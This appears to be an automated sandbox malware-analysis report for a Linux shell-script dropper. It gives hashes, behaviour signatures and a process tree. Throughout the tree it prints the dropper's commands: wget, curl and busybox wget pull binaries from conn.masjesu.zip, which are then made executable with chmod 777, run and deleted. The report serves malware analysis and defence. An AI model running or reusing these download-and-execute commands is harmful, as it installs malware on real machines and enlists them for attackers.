Analysis
max time kernel: 149s
max time network: 151s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 18/10/2024, 01:50
Static task: static1

Behavioral task: behavioral1
Sample: 5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
Resource: ubuntu1804-amd64-20240611-en

Behavioral task: behavioral2
Sample: 5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
Resource: debian9-armhf-20240611-en

Behavioral task: behavioral3
Sample: 5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
Resource: debian9-mipsbe-20240729-en

Behavioral task: behavioral4
Sample: 5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
Resource: debian9-mipsel-20240611-en
General
Target: 5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
Size: 10KB
MD5: 18767cb509f9d0bc866674148d1edcca
SHA1: 7da11a4c8d3de676c5d337d2828d07d49613db95
SHA256: 5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e
SHA512: 13a40c89327145f35f25a8071216d8e8e1527b928229138ef80a5081b1f1cb06af23766b68a4ab80fbdb8113fa436576c6c60d0e94594052643aa02b715b1ec8
SSDEEP: 96:YCafnjMdCnjMFHmnjMdpMojMkMyL8LALD2uLL7A787/4YALDfDzD8tlYzb3IsLOV:X45FY+6zI3TmU3Tx2
Malware Config
Signatures
File and Directory Permissions Modification (1 TTP, 28 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod
PIDs: 812, 819, 829, 836, 843, 851, 859, 867, 875, 883, 891, 898, 906, 914, 922, 930, 938, 946, 954, 962, 969, 977, 985, 993, 1001, 1008, 1015, 1022
Executes dropped EXE (28 IoCs)
ioc | pid | Process
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | 813 | s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | 820 | 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | 830 | MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | 837 | ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | 844 | Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | 852 | rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | 860 | vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | 868 | t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | 876 | X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | 884 | sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | 892 | hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | 899 | 3wDzYpBDBabysp43dimFTylVEdU479lZE3
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | 907 | OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | 915 | tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | 923 | X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | 931 | rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | 939 | vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | 947 | t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | 955 | sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | 963 | hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | 970 | 3wDzYpBDBabysp43dimFTylVEdU479lZE3
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | 978 | OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | 986 | tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | 994 | Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | 1002 | s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | 1009 | 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | 1016 | MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | 1023 | ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
Reads runtime system information (28 IoCs)
description | ioc | Process
File opened for reading | /proc/sys/crypto/fips_enabled | curl
(this row is recorded 28 times, once for each curl process in the process tree below)
System Network Configuration Discovery (1 TTP, 64 IoCs)
Adversaries may gather information about the network configuration of a system.
Process: busybox (20 PIDs): 736, 828, 835, 850, 858, 866, 874, 890, 913, 921, 937, 945, 953, 961, 968, 984, 992, 1000, 1007, 1014
Process: wget (21 PIDs): 815, 822, 847, 863, 871, 879, 887, 894, 910, 918, 926, 934, 942, 950, 958, 965, 981, 997, 1004, 1011, 1018
Process: curl (23 PIDs): 729, 823, 833, 840, 848, 856, 864, 872, 880, 888, 895, 919, 927, 935, 943, 959, 966, 982, 990, 998, 1005, 1012, 1019
Writes file to tmp directory (28 IoCs)
Malware often drops required files in the /tmp directory.
description | ioc | Process
File opened for modification | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | curl
File opened for modification | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | curl
File opened for modification | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | curl
File opened for modification | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | curl
File opened for modification | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | curl
File opened for modification | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | curl
File opened for modification | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | curl
File opened for modification | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | curl
File opened for modification | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | curl
File opened for modification | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | curl
File opened for modification | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | curl
File opened for modification | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | curl
File opened for modification | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | curl
File opened for modification | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | curl
File opened for modification | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | curl
File opened for modification | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | curl
File opened for modification | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | curl
File opened for modification | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | curl
File opened for modification | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | curl
File opened for modification | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | curl
File opened for modification | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | curl
File opened for modification | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | curl
File opened for modification | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | curl
File opened for modification | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | curl
File opened for modification | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | curl
File opened for modification | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | curl
File opened for modification | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | curl
File opened for modification | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | curl
Processes
(one row per process: PID | tree level | image | command line; the signatures a process triggered are listed indented below its row)

PID | level | image | command line
704 | 1 | /tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh | /tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
707 | 2 | /bin/rm | /bin/rm bins.sh
713 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
729 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
736 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
    - System Network Configuration Discovery
812 | 2 | /bin/chmod | chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
    - File and Directory Permissions Modification
813 | 2 | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | ./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
    - Executes dropped EXE
814 | 2 | /bin/rm | rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
815 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
    - System Network Configuration Discovery
816 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
    - Reads runtime system information
    - Writes file to tmp directory
818 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
819 | 2 | /bin/chmod | chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
    - File and Directory Permissions Modification
820 | 2 | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | ./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
    - Executes dropped EXE
821 | 2 | /bin/rm | rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
822 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
    - System Network Configuration Discovery
823 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
828 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
    - System Network Configuration Discovery
829 | 2 | /bin/chmod | chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
    - File and Directory Permissions Modification
830 | 2 | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | ./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
    - Executes dropped EXE
831 | 2 | /bin/rm | rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
832 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
833 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
835 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
    - System Network Configuration Discovery
836 | 2 | /bin/chmod | chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
    - File and Directory Permissions Modification
837 | 2 | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | ./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
    - Executes dropped EXE
838 | 2 | /bin/rm | rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
839 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
840 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
842 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
843 | 2 | /bin/chmod | chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
    - File and Directory Permissions Modification
844 | 2 | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | ./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
    - Executes dropped EXE
846 | 2 | /bin/rm | rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
847 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
    - System Network Configuration Discovery
848 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
850 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
    - System Network Configuration Discovery
851 | 2 | /bin/chmod | chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
    - File and Directory Permissions Modification
852 | 2 | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | ./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
    - Executes dropped EXE
854 | 2 | /bin/rm | rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
855 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
856 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
858 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
    - System Network Configuration Discovery
859 | 2 | /bin/chmod | chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
    - File and Directory Permissions Modification
860 | 2 | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | ./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
    - Executes dropped EXE
862 | 2 | /bin/rm | rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
863 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
    - System Network Configuration Discovery
864 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
866 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
    - System Network Configuration Discovery
867 | 2 | /bin/chmod | chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
    - File and Directory Permissions Modification
868 | 2 | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | ./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
    - Executes dropped EXE
870 | 2 | /bin/rm | rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
871 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
    - System Network Configuration Discovery
872 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
874 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
    - System Network Configuration Discovery
875 | 2 | /bin/chmod | chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
    - File and Directory Permissions Modification
876 | 2 | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | ./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
    - Executes dropped EXE
878 | 2 | /bin/rm | rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
879 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
    - System Network Configuration Discovery
880 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
882 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
883 | 2 | /bin/chmod | chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
    - File and Directory Permissions Modification
884 | 2 | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | ./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
    - Executes dropped EXE
886 | 2 | /bin/rm | rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
887 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
    - System Network Configuration Discovery
888 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
890 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
    - System Network Configuration Discovery
891 | 2 | /bin/chmod | chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
    - File and Directory Permissions Modification
892 | 2 | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | ./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
    - Executes dropped EXE
893 | 2 | /bin/rm | rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
894 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3
    - System Network Configuration Discovery
895 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
897 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3
898 | 2 | /bin/chmod | chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3
    - File and Directory Permissions Modification
899 | 2 | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | ./3wDzYpBDBabysp43dimFTylVEdU479lZE3
    - Executes dropped EXE
901 | 2 | /bin/rm | rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3
902 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
903 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
    - Reads runtime system information
    - Writes file to tmp directory
905 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
906 | 2 | /bin/chmod | chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
    - File and Directory Permissions Modification
907 | 2 | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | ./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
    - Executes dropped EXE
909 | 2 | /bin/rm | rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
910 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
    - System Network Configuration Discovery
911 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
    - Reads runtime system information
    - Writes file to tmp directory
913 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
    - System Network Configuration Discovery
914 | 2 | /bin/chmod | chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
    - File and Directory Permissions Modification
915 | 2 | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | ./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
    - Executes dropped EXE
917 | 2 | /bin/rm | rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
918 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
    - System Network Configuration Discovery
919 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
921 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
    - System Network Configuration Discovery
922 | 2 | /bin/chmod | chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
    - File and Directory Permissions Modification
923 | 2 | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | ./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
    - Executes dropped EXE
925 | 2 | /bin/rm | rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
926 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
    - System Network Configuration Discovery
927 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
929 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
930 | 2 | /bin/chmod | chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
    - File and Directory Permissions Modification
931 | 2 | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | ./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
    - Executes dropped EXE
933 | 2 | /bin/rm | rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
934 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
    - System Network Configuration Discovery
935 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
937 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
    - System Network Configuration Discovery
938 | 2 | /bin/chmod | chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
    - File and Directory Permissions Modification
939 | 2 | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | ./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
    - Executes dropped EXE
941 | 2 | /bin/rm | rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
942 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
    - System Network Configuration Discovery
943 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
945 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
    - System Network Configuration Discovery
946 | 2 | /bin/chmod | chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
    - File and Directory Permissions Modification
947 | 2 | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | ./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
    - Executes dropped EXE
949 | 2 | /bin/rm | rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
950 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
    - System Network Configuration Discovery
951 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
    - Reads runtime system information
    - Writes file to tmp directory
953 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
    - System Network Configuration Discovery
954 | 2 | /bin/chmod | chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
    - File and Directory Permissions Modification
955 | 2 | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | ./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
    - Executes dropped EXE
957 | 2 | /bin/rm | rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
958 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
    - System Network Configuration Discovery
959 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
961 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
    - System Network Configuration Discovery
962 | 2 | /bin/chmod | chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
    - File and Directory Permissions Modification
963 | 2 | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | ./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
    - Executes dropped EXE
964 | 2 | /bin/rm | rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
965 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3
    - System Network Configuration Discovery
966 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
968 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3
    - System Network Configuration Discovery
969 | 2 | /bin/chmod | chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3
    - File and Directory Permissions Modification
